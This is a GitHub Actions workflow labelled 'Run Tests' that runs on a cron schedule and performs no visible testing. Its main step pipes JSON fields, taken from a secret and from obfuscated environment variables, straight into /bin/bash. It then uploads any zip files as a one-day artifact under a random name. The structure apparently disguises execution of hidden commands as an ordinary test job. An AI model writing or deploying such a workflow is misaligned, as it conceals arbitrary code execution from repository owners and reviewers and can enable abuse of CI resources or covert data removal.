name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '2 2,8,14,20 * * *'
env:
  CI: true
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          n304: ${{ secrets.n304 }}
        run: |
          printf '%s' "$n304" | jq -r .qwfk9 | /bin/bash
          echo $jxp504 | jq -r .symfn77466 | /bin/bash
          echo $ysiyl7 | jq -r .a087 | /bin/bash
          printf '%s' "$st35" | jq -r .t034 | /bin/bash
          echo $zk7 | jq -r .ox164 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: Fxrb1acz
          path: "*.zip"
          retention-days: 1
